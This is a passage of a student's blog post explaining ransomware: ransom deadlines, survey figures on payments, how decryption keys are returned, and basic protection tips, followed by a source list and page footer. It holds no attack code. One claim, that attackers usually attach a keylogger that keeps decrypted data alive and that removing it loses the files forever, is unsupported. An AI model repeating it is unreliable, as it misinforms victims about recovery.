                    <p>Another factor is that the server will wait for a certain time period. As seen on the image above, 72 Hours would be an example. Therefore, if a victim wanted to pay Ransom to get their files back, they would not be able to do so after the given time period.</p>

                    <h2 class="section-heading">How much is payed?</h2>

                    <p>According to <a href="https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/" target="about_blank">onthewire</a>, 600 companies who were victims of this kind of attack were surveyed. It was identified that about 45% of them have payed between $20,000 to amounts greater than $40,000. Most of the hackers tend to attack big corporates because there is a higher chance of big profit.</p>

                    <h2 class="section-heading">How do the files get decrypted?</h2>

                    <p>Once the victims pay the fee, the hacker's server sends back a Private Decryption Key to the victim. This Private Decryption Key unlocks the data that have been locked. However, there is no guarantee that the hacker will send the Private Decryption Key to the user. This is why it is better to say no and start from scratch or from back up.</p>

                    <p>Even if you get your files back, you are at a greater risk of being attacked again. The hackers usually attach a piece of software with the Private Decryption Key which will keep the data alive. One example of such software would be a Key Logger. Key Loggers log every key that is being typed by a user. This makes it possible for the hacker to steal personal information. If your anti-virus happens to detect the malicious software and you remove it, your data will be lost forever.</p>

                    <h2 class="section-heading">What can you do to protect yourself?</h2>

                    <p>There are several options available to protect yourself from Ransomware or other Malware Attacks.</p>

                    <p>1. Create a back up of your entire operating system in an external hard drive.</p>

                    <p>2. Update every software on your computer to their latest versions.</p>

                    <p>3. NEVER click on unwanted sources or sources that you do not know about on the internet. This includes getting an email from somebody whom you should not have received an email from. You should double check the sender of the emails you receive.</p>

                    <p>4. Edit Firewall settings on your computer. Firewall is a tool that handles network permissions for applications that run on your computer. A hacker will not be able to establish a connection through applications if you do not permit the applications to connect to a network.</p>

                    <p>5. If you use Windows, there is a feature called user control. User control notifies you everytime a new application tries to make changes to your computer.</p>

                    <h2 class="section-heading">Presentation</h2>

                    <p>Here is the presentation that I presented to my engineering class.</p>

                    <iframe src="https://docs.google.com/presentation/d/1iscy1zGikkpysmj1ZMWLEzoMcrFAaU7vKZ8Lm88rs8A/embed?start=true&loop=true&delayms=3000" frameborder="0" width="600" height="450" allowfullscreen="true" mozallowfullscreen="true" webkitallowfullscreen="true"></iframe>

                    <h2 class="section-heading">Sources</h2>

                    <p>1. <a href="https://techterms.com/definition/malware" target="about_blank">https://techterms.com/definition/malware</a></p>

                    <p>2. <a href="http://www.computerhope.com/vcih.htm" target="about_blank">http://www.computerhope.com/vcih.htm</a></p>

                    <p>3. <a href="https://www.f-secure.com/v-descs/iworm.shtml" target="about_blank">https://www.f-secure.com/v-descs/iworm.shtml</a></p>

                    <p>4. <a href="https://www.lifewire.com/brief-history-of-malware-153616" target="about_blank">https://www.lifewire.com/brief-history-of-malware-153616</a></p>

                    <p>5. <a href="https://blog.varonis.com/a-brief-history-of-ransomware/" target="about_blank">https://blog.varonis.com/a-brief-history-of-ransomware/</a></p>

                    <p>6. <a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-evolution-of-ransomware.pdf" target="about_blank">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-evolution-of-ransomware.pdf</a></p>

                    <p>7. <a href="http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/" target="about_blank">http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/</a></p>

                    <p>8. <a href="https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx" target="about_blank">https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx</a></p>

                    <p>9. <a href="https://nakedsecurity.sophos.com/2016/06/20/ransomware-thats-100-pure-javascript-no-download-required/" target="about_blank">https://nakedsecurity.sophos.com/2016/06/20/ransomware-thats-100-pure-javascript-no-download-required/</a></p>

                    <p>10. <a href="http://thehackernews.com/2015/08/ransomware-creator-toolkit.html" target="about_blank">http://thehackernews.com/2015/08/ransomware-creator-toolkit.html</a></p>

                    <p>11. <a href="https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/" target="about_blank">https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/</a></p>

                    <p>12. <a href="https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/" target="about_blank">https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/</a></p>

                    <p>13. <a href="https://www.youtube.com/watch?v=LtiRISepIfs&feature=youtu.be">https://www.youtube.com/watch?v=LtiRISepIfs&feature=youtu.be</a></p>

                    <span class="meta">Share this: </span>
                        
                        <iframe src="https://www.facebook.com/plugins/share_button.php?href=https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Fplugins%2F&layout=button_count&size=small&mobile_iframe=true&width=86&height=20&appId" width="95" height="20" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true">Facebook</iframe>

                        <a href="https://twitter.com/share" class="twitter-share-button" data-text="TAHF. BLOGS is a personal blog of a programmer&#39;s experience." data-url="https://publish.twitter.com/#" data-show-count="false">Tweet </a>

                    <hr>

                     <!-- Pager -->
                    <ul class="pager">
                      <li>
                        <a href="../posts.html">&larr; Go Back</a>
                      </li>
                    </ul> 

                </div>
            </div>
        </div>
    </article>

    <hr>

    <!-- Footer -->
    <footer>
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    <p class="copyright text-muted">Copyright &copy; TAHF. BLOGS 2017.</p>
                </div>
            </div>
        </div>
    </footer>

    <!-- Twitter Share Button-->
    <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

    <!-- Share Buttons JavaScript -->
    <script src="../js/social-share-kit.js"></script>
    <script src="../js/social-share-kit.min.js"></script>

    <!-- jQuery -->
    <script src="../vendor/jquery/jquery.min.js"></script>

    <!-- Bootstrap Core JavaScript -->
    <script src="../vendor/bootstrap/js/bootstrap.min.js"></script>

    <!-- Contact Form JavaScript -->
    <script src="../js/jqBootstrapValidation.js"></script>
    <script src="~/js/contact_me.js"></script>

    <!-- Theme JavaScript -->
    <script src="../js/clean-blog.min.js"></script>

</body>

</html>
>>>>>>> Edited index heading & Updated JQuery
